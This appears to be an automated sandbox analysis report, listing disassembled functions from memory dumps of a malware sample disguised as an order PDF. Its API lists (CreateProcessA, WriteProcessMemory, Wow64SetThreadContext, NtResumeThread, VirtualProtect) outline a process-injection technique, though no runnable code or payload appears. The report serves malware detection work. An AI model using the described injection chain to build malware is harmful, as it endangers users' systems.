                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 2706961497-0
                                                                                • Opcode ID: 37f02f49484b33a5052ddb738327d2187f4395189ca58d22b34317b495f8823d
                                                                                • Instruction ID: ce1bef9f267e0331abbce03d9e075e1486a4682523ad4665a12a2bf9f10ea9f9
                                                                                • Opcode Fuzzy Hash: 37f02f49484b33a5052ddb738327d2187f4395189ca58d22b34317b495f8823d
                                                                                • Instruction Fuzzy Hash: 8121E4B1D013499FCB10DFAAD984AEEFBF5FF48310F24842AE519A7250C775A944CBA1
                                                                                Function 0489C698 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtResumeThread.NTDLL(?,?), ref: 0489C70E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 8fa3d583b287e7d2038b244bd5bfd5c8e38e516d57a007d11ccac9b6347be0f4
                                                                                • Instruction ID: a2abff6068386cc399df2303ab8641ad66a5ddbdcf7bdecac8bcc70face4653e
                                                                                • Opcode Fuzzy Hash: 8fa3d583b287e7d2038b244bd5bfd5c8e38e516d57a007d11ccac9b6347be0f4
                                                                                • Instruction Fuzzy Hash: 901112B5D006088FDB10DFAAC5847AEFBF5FF49324F14882AD419A7240CB78A945CFA1
                                                                                Function 0489C6A0 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtResumeThread.NTDLL(?,?), ref: 0489C70E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 2500234af873fb353784830483fbb7aab8ace477de7465eb2e52528b58324e53
                                                                                • Instruction ID: 0f43758d3788df29b90bc4228ccf61ac672e7dde30364607f4aacfb1960ba166
                                                                                • Opcode Fuzzy Hash: 2500234af873fb353784830483fbb7aab8ace477de7465eb2e52528b58324e53
                                                                                • Instruction Fuzzy Hash: 251114B1D002089FDB10DFAAC484AAEFBF5FF49324F54842AD419A7240CB79A945CFA1
                                                                                Function 04893078 Relevance: 1.6, Strings: 1, Instructions: 301COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PH]q
                                                                                • API String ID: 0-3168235125
                                                                                • Opcode ID: 960ab1b93f23071b95d0c96ac2e9c6bb2b14f6ebb1a608f2f78234a3902dac31
                                                                                • Instruction ID: 2e61b1078ea2d7bb24442785a9a10177736cc0889746863c3cfe7262ca704190
                                                                                • Opcode Fuzzy Hash: 960ab1b93f23071b95d0c96ac2e9c6bb2b14f6ebb1a608f2f78234a3902dac31
                                                                                • Instruction Fuzzy Hash: 1BD10570E04618CFDB54CFA9D884BADBBF2BB89304F2485A9D809E7254DB74AD85DF01
                                                                                Function 072DF658 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2255218343.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_72c0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Ddq
                                                                                • API String ID: 0-562783569
                                                                                • Opcode ID: 872aed8f753983ddaf463b25e60a3f36dcb7d06700e097ff2ead40bd30bcf29a
                                                                                • Instruction ID: 4926fb45d7e6edc4efb56fb52086cbbd874a69248c689ee9befe891a2a3966dd
                                                                                • Opcode Fuzzy Hash: 872aed8f753983ddaf463b25e60a3f36dcb7d06700e097ff2ead40bd30bcf29a
                                                                                • Instruction Fuzzy Hash: 8ED1A074E00219CFDB58DFA9D990A9DBBB2FF88300F1081A9D509AB365DB31AD81CF41
                                                                                Function 048D5A4B Relevance: .3, Instructions: 294COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fae87944cdc6d891d31bae27b3e45cb545ce926ea110fc8532e84a32c03605bd
                                                                                • Instruction ID: e80d4650fcaf369201f6baf09f8f881d270f87926481672d12d3cb5b8f1902dc
                                                                                • Opcode Fuzzy Hash: fae87944cdc6d891d31bae27b3e45cb545ce926ea110fc8532e84a32c03605bd
                                                                                • Instruction Fuzzy Hash: B3D13770E02258DFDB54DFA9D884B9DBBF1FF49304F2085AAD409AB294EB706985CF01
                                                                                Function 048D5A50 Relevance: .3, Instructions: 287COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: acf367f74ab2ea5f7f8cdb132659e7ecb88646b372073fbc69e5e871b961d4e3
                                                                                • Instruction ID: d7940737532a99d390707fe0eb94a11a828fe590dfa22b9199d13d5b1aaf218f
                                                                                • Opcode Fuzzy Hash: acf367f74ab2ea5f7f8cdb132659e7ecb88646b372073fbc69e5e871b961d4e3
                                                                                • Instruction Fuzzy Hash: B1D12770E02258DFDB54DFA9D884B9DBBF1FF49304F2085AAD409AB294EB706985CF00
                                                                                Function 00F2347B Relevance: .3, Instructions: 258COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 944d7bdc3b68c1ac03157cea081b75483eb3da288ca833b130002892cf5355f7
                                                                                • Instruction ID: d57f91588ad83c29c9b19d219c4310d252e0aa14242d95274d80fb413767f4fe
                                                                                • Opcode Fuzzy Hash: 944d7bdc3b68c1ac03157cea081b75483eb3da288ca833b130002892cf5355f7
                                                                                • Instruction Fuzzy Hash: 2BA1D5B2E04259DFCB10CF98E890BAEBBB1FF44300F258566E505A7241D738AF45EB51
                                                                                Function 0489239D Relevance: .2, Instructions: 244COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 57cabeb314379e6f561ec27be980277373b6ccabcb00d376fd7634f395713b6d
                                                                                • Instruction ID: 97f88ebebe77315386fdd77992354bab7b9619d8b2cff7d5e8f285878efbef54
                                                                                • Opcode Fuzzy Hash: 57cabeb314379e6f561ec27be980277373b6ccabcb00d376fd7634f395713b6d
                                                                                • Instruction Fuzzy Hash: 20B13874E00658CFDB58DFA8C854BADBBF2FB49304F1085AAD509AB255DB34AD85CF01
                                                                                Function 00F256E2 Relevance: 6.4, Strings: 4, Instructions: 1441COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 f256e2-f256e3 1 f256e5 0->1 1->1 2 f256e7-f256e8 1->2 3 f25673 2->3 4 f256ea-f256f0 2->4 5 f25695-f256cc 3->5 6 f25675-f25693 3->6 10 f2461e-f24629 5->10 6->5 12 f24637-f24668 10->12 13 f246a4-f24792 10->13 14 f2466a-f2469f 10->14 12->10 38 f25b15 13->38 39 f24798 13->39 14->10 38->38 40 f247a0-f249df 39->40 40->38 53 f249e5-f24b08 40->53 53->38 60 f24b0e-f24c47 53->60 60->38 67 f24c4d-f24d90 60->67 67->38 74 f24d96-f25672 67->74 74->3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: TJbq$jjjjjj$$]q$$]q
                                                                                • API String ID: 0-2713803779
                                                                                • Opcode ID: ca46bfd2c4948e9c7f45762eb14424bebc718e5de4fb522daf9fb86681f6df3d
                                                                                • Instruction ID: da2b40688710d0725df8dca9c7ab4cff61b3d46f763f4f050784f3194140614f
                                                                                • Opcode Fuzzy Hash: ca46bfd2c4948e9c7f45762eb14424bebc718e5de4fb522daf9fb86681f6df3d
                                                                                • Instruction Fuzzy Hash: 21E2177A250510EFDB4A9F98D948D55BBB2FF4D32471A85D8F2099B232C732E861EF40
                                                                                Function 00F25711 Relevance: 6.4, Strings: 4, Instructions: 1435COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 128 f25711-f25712 129 f256cc 128->129 130 f2461e-f24629 129->130 132 f24637-f24668 130->132 133 f246a4-f24792 130->133 134 f2466a-f2469f 130->134 132->130 158 f25b15 133->158 159 f24798 133->159 134->130 158->158 160 f247a0-f249df 159->160 160->158 173 f249e5-f24b08 160->173 173->158 180 f24b0e-f24c47 173->180 180->158 187 f24c4d-f24d90 180->187 187->158 194 f24d96-f25673 187->194 249 f25695-f256c7 194->249 250 f25675-f25693 194->250 249->129 250->249
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: TJbq$jjjjjj$$]q$$]q
                                                                                • API String ID: 0-2713803779
                                                                                • Opcode ID: fa48d9c510ef9e5a432990f57a5c87797c8e02ea78ec9db9c0854af836dd0278
                                                                                • Instruction ID: 20335d4b95b27777e693a2a96a35ea384a305dee91805e675d58f16d2309f90e
                                                                                • Opcode Fuzzy Hash: fa48d9c510ef9e5a432990f57a5c87797c8e02ea78ec9db9c0854af836dd0278
                                                                                • Instruction Fuzzy Hash: C6D2177A250510EFDB4A9F98D948D55BBB2FF4D32471A85D8F2099B232C732E861EF40
                                                                                Function 00F24516 Relevance: 6.3, Strings: 5, Instructions: 7COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 253 f24516-f245b3 255 f25b15 253->255 255->255
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: TJbq$TJbq$jjjjjj$$]q$$]q
                                                                                • API String ID: 0-480122481
                                                                                • Opcode ID: a07dbd11c0185e3934f286c6040ae579ed1f990759051dc37050e79c9de63cb3
                                                                                • Instruction ID: 9792d4956e5278cb168ebba392b49a50d68c7f9f61da130b182994e130b6c6ad
                                                                                • Opcode Fuzzy Hash: a07dbd11c0185e3934f286c6040ae579ed1f990759051dc37050e79c9de63cb3
                                                                                • Instruction Fuzzy Hash: D2B0921240E3C1CF8B124A5444E11647F64AA62140368C4E6C4C68E44BC454C9C6F332
                                                                                Function 00F21978 Relevance: 5.4, Strings: 4, Instructions: 365COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 256 f21978-f219d9 261 f219e5-f219f9 256->261 262 f219db-f219df 256->262 264 f21a07-f21a12 261->264 262->261 266 f219fb-f219fe 264->266 266->264 267 f21a00 266->267 267->264 268 f21dd0-f21dd3 267->268 269 f21a76-f21a78 267->269 270 f21c56-f21c5d 267->270 271 f21a14-f21a29 267->271 272 f21a59-f21a74 267->272 273 f21aff 267->273 274 f21c7c-f21c95 267->274 275 f21a3d-f21a42 267->275 276 f21ae3-f21afa 267->276 277 f21dc3-f21dce 267->277 278 f21da6-f21dc1 call f2113c 267->278 279 f21a44-f21a57 267->279 280 f21aca-f21ade 267->280 281 f21c6a-f21c7a 267->281 282 f21a2b-f21a3b 267->282 283 f21a88-f21a8b 267->283 365 f21dd6 call f22140 268->365 366 f21dd6 call f22131 268->366 284 f21b00-f21b03 269->284 285 f21a7e-f21a83 269->285 299 f21c63-f21c68 270->299 271->266 272->266 273->284 303 f21c97-f21c99 274->303 304 f21c9b 274->304 275->266 276->266 286 f21d8d-f21d90 277->286 278->286 279->266 280->266 309 f21c2f-f21c32 281->309 282->266 287 f21a91-f21aa4 283->287 288 f21e35-f21ea1 283->288 284->283 302 f21b05-f21b54 call f2112c 284->302 285->266 290 f21d92 286->290 291 f21d99-f21da4 286->291 287->288 297 f21aaa-f21ab6 287->297 317 f21ea3 288->317 318 f21ee6 288->318 290->268 290->277 290->278 290->291 306 f21e1b-f21e34 290->306 291->286 296 f21ddc-f21de7 296->286 297->288 308 f21abc-f21ac5 297->308 299->309 341 f21b60-f21bcf 302->341 342 f21b56-f21b5a 302->342 311 f21ca0-f21ca2 303->311 304->311 308->266 314 f21c24 309->314 315 f21c34 309->315 320 f21ca4 311->320 321 f21cad 311->321 314->309 315->268 315->270 315->274 315->277 315->278 315->281 315->306 323 f21c3b-f21c4f 315->323 317->318 325 f21ec3-f21ec8 317->325 326 f21ed1-f21ed6 317->326 327 f21eb5-f21eba 317->327 328 f21eca-f21ecf 317->328 329 f21eaa-f21eac 317->329 330 f21ed8-f21edd 317->330 331 f21eae-f21eb3 317->331 332 f21edf-f21ee4 317->332 333 f21ebc-f21ec1 317->333 322 f21ee9-f21eea 318->322 320->321 321->286 323->270 325->322 326->322 327->322 328->322 329->322 330->322 331->322 332->322 333->322 351 f21bd1-f21be4 341->351 352 f21be6-f21bf9 341->352 342->341 355 f21c1b 351->355 358 f21c02 352->358 359 f21bfb-f21c00 352->359 363 f21c1b call f21f38 355->363 364 f21c1b call f21f29 355->364 357 f21c21 357->314 360 f21c04-f21c06 358->360 359->360 360->323 361 f21c08-f21c19 360->361 361->355 363->357 364->357 365->296 366->296
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$TJbq$TJbq$Te]q
                                                                                • API String ID: 0-2582363881
                                                                                • Opcode ID: 2392229a2506011af695e9174d6730d5b031dd36273987e3c00fe9b9fce62d46
                                                                                • Instruction ID: 6610025bf9a23c6eb8b32d97ec3e1fcac2e940e0bf05241bd9b6aa7f2e441720
                                                                                • Opcode Fuzzy Hash: 2392229a2506011af695e9174d6730d5b031dd36273987e3c00fe9b9fce62d46
                                                                                • Instruction Fuzzy Hash: D3E1AF35A041548FCB04CFA8E894B6DBBF1FF59310F2541AAE446DB3A2CA35EC45EB45
                                                                                Function 0489BCC7 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 788 489bcc7-489bd40 790 489bd79-489bd99 788->790 791 489bd42-489bd4c 788->791 796 489bd9b-489bda5 790->796 797 489bdd2-489be0c 790->797 791->790 792 489bd4e-489bd50 791->792 794 489bd73-489bd76 792->794 795 489bd52-489bd5c 792->795 794->790 798 489bd5e 795->798 799 489bd60-489bd6f 795->799 796->797 801 489bda7-489bda9 796->801 805 489be0e-489be18 797->805 806 489be45-489beba CreateProcessA 797->806 798->799 799->799 800 489bd71 799->800 800->794 802 489bdab-489bdb5 801->802 803 489bdcc-489bdcf 801->803 807 489bdb9-489bdc8 802->807 808 489bdb7 802->808 803->797 805->806 809 489be1a-489be1c 805->809 818 489bebc-489bec2 806->818 819 489bec3-489bf0b 806->819 807->807 810 489bdca 807->810 808->807 811 489be3f-489be42 809->811 812 489be1e-489be28 809->812 810->803 811->806 814 489be2a 812->814 815 489be2c-489be3b 812->815 814->815 815->815 816 489be3d 815->816 816->811 818->819 824 489bf1b-489bf1f 819->824 825 489bf0d-489bf11 819->825 827 489bf2f-489bf33 824->827 828 489bf21-489bf25 824->828 825->824 826 489bf13 825->826 826->824 830 489bf43 827->830 831 489bf35-489bf39 827->831 828->827 829 489bf27 828->829 829->827 833 489bf44 830->833 831->830 832 489bf3b 831->832 832->830 833->833
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0489BEAA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: 5e96a70a82273f431512943effd79ed4967e31e5d57a4e41d9346dcef236c0e8
                                                                                • Instruction ID: aaf39ca4913be07400ab968b246f54db0c3bcff60e44362f62f47e016f27719a
                                                                                • Opcode Fuzzy Hash: 5e96a70a82273f431512943effd79ed4967e31e5d57a4e41d9346dcef236c0e8
                                                                                • Instruction Fuzzy Hash: 79812671D006199FDF10CFA9D8857ADBBF2BF48314F188A29E819E7250D774A8818B81
                                                                                Function 0489BCD0 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 834 489bcd0-489bd40 836 489bd79-489bd99 834->836 837 489bd42-489bd4c 834->837 842 489bd9b-489bda5 836->842 843 489bdd2-489be0c 836->843 837->836 838 489bd4e-489bd50 837->838 840 489bd73-489bd76 838->840 841 489bd52-489bd5c 838->841 840->836 844 489bd5e 841->844 845 489bd60-489bd6f 841->845 842->843 847 489bda7-489bda9 842->847 851 489be0e-489be18 843->851 852 489be45-489beba CreateProcessA 843->852 844->845 845->845 846 489bd71 845->846 846->840 848 489bdab-489bdb5 847->848 849 489bdcc-489bdcf 847->849 853 489bdb9-489bdc8 848->853 854 489bdb7 848->854 849->843 851->852 855 489be1a-489be1c 851->855 864 489bebc-489bec2 852->864 865 489bec3-489bf0b 852->865 853->853 856 489bdca 853->856 854->853 857 489be3f-489be42 855->857 858 489be1e-489be28 855->858 856->849 857->852 860 489be2a 858->860 861 489be2c-489be3b 858->861 860->861 861->861 862 489be3d 861->862 862->857 864->865 870 489bf1b-489bf1f 865->870 871 489bf0d-489bf11 865->871 873 489bf2f-489bf33 870->873 874 489bf21-489bf25 870->874 871->870 872 489bf13 871->872 872->870 876 489bf43 873->876 877 489bf35-489bf39 873->877 874->873 875 489bf27 874->875 875->873 879 489bf44 876->879 877->876 878 489bf3b 877->878 878->876 879->879
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0489BEAA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: b655b4c7134b8eff93e567887539f8e02230fc053f1d14e920a96b63e8e53daa
                                                                                • Instruction ID: 4906847d2b5322e6977f7d32b6703ef77d043bbf5cbfcd9af2848c1f39b7bf39
                                                                                • Opcode Fuzzy Hash: b655b4c7134b8eff93e567887539f8e02230fc053f1d14e920a96b63e8e53daa
                                                                                • Instruction Fuzzy Hash: 70812571D00A599FDF10CFA9D8817ADBBF6BF48314F188A29E818E7250D774A881CF81
                                                                                Function 0489C4E8 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 880 489c4e8-489c53e 882 489c54e-489c58d WriteProcessMemory 880->882 883 489c540-489c54c 880->883 885 489c58f-489c595 882->885 886 489c596-489c5c6 882->886 883->882 885->886
                                                                                APIs
                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0489C580
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: df8698fbfb359c0988424712edca428bb0914612120d627a617fe03e021aadfa
                                                                                • Instruction ID: e6e434c10c61f889d759aacad2e35beab6d986246bb5008a496c10dc6a0f53af
                                                                                • Opcode Fuzzy Hash: df8698fbfb359c0988424712edca428bb0914612120d627a617fe03e021aadfa
                                                                                • Instruction Fuzzy Hash: BD2146B5900349DFCB10CFA9C9817EEBBF5FF48310F14882AE959A7241C778A954CBA0
                                                                                Function 0489C4F0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 890 489c4f0-489c53e 892 489c54e-489c58d WriteProcessMemory 890->892 893 489c540-489c54c 890->893 895 489c58f-489c595 892->895 896 489c596-489c5c6 892->896 893->892 895->896
                                                                                APIs
                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0489C580
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 0d3b47ce60ffa496a55dd3475f2128d231e1dcef8c529b5f9ab00102f8c19c46
                                                                                • Instruction ID: 47081260c347d641576b79bb7ffded600006f82149ba75805121bcf6c4ae1a23
                                                                                • Opcode Fuzzy Hash: 0d3b47ce60ffa496a55dd3475f2128d231e1dcef8c529b5f9ab00102f8c19c46
                                                                                • Instruction Fuzzy Hash: 5F2139B19003099FCF10DFAAC885BEEBBF5FF48310F148429E919A7240C779A944CBA4
                                                                                Function 0489BFD0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 916 489bfd0-489c01b 918 489c02b-489c05b Wow64SetThreadContext 916->918 919 489c01d-489c029 916->919 921 489c05d-489c063 918->921 922 489c064-489c094 918->922 919->918 921->922
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0489C04E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: 910f7bd17967295467c4c3b459660fedf92567efc768513e4fddab2534fccc1f
                                                                                • Instruction ID: 99fc29b0bbd1cb827f642477ed04d5ec51a5ad2db860df40c21f8bc6bf6bd252
                                                                                • Opcode Fuzzy Hash: 910f7bd17967295467c4c3b459660fedf92567efc768513e4fddab2534fccc1f
                                                                                • Instruction Fuzzy Hash: 132135B19003099FDB10DFAAC4857EEBBF4EF48324F14842AD519A7240CB79A945CFA1
                                                                                Function 0489BFCA Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0489C04E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: 5874235e64ffb37caf0fc727a0739f4f29b277db46becaa886c058c27cbb48c2
                                                                                • Instruction ID: a0ebf56ac7fdeaaece911de16c3712d601276d8f6b77c42f5c18d6052fbb2951
                                                                                • Opcode Fuzzy Hash: 5874235e64ffb37caf0fc727a0739f4f29b277db46becaa886c058c27cbb48c2
                                                                                • Instruction Fuzzy Hash: 452168B1D003099FDB10DFAAC5817EEBBF4AF48314F14842ED559A7240C778A985CFA1
                                                                                Function 0489C8D8 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 0489C954
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 088fbb669ed0eb05159e0293b25f14993f3aa44214e112105c1200c12e2a1411
                                                                                • Instruction ID: af9d86a12f64bc3ef55d779494b2909a4defe328e6e53fcf5474679306efd9ef
                                                                                • Opcode Fuzzy Hash: 088fbb669ed0eb05159e0293b25f14993f3aa44214e112105c1200c12e2a1411
                                                                                • Instruction Fuzzy Hash: 512104B1C002499FDB10DFAAC5416EEBBF5BF48320F14842AD469A7240DB7899458BA5
                                                                                Function 0489C8E0 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 0489C954
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 818ccc2ffd32ca6dc4c20fba9081f4eec429bc3bee81e72cf89757ce2346ba65
                                                                                • Instruction ID: 7d2633b5ed96ceeb8d8b4d0b803f8866bf4ae6d79908c0a5806cf5ed16373897
                                                                                • Opcode Fuzzy Hash: 818ccc2ffd32ca6dc4c20fba9081f4eec429bc3bee81e72cf89757ce2346ba65
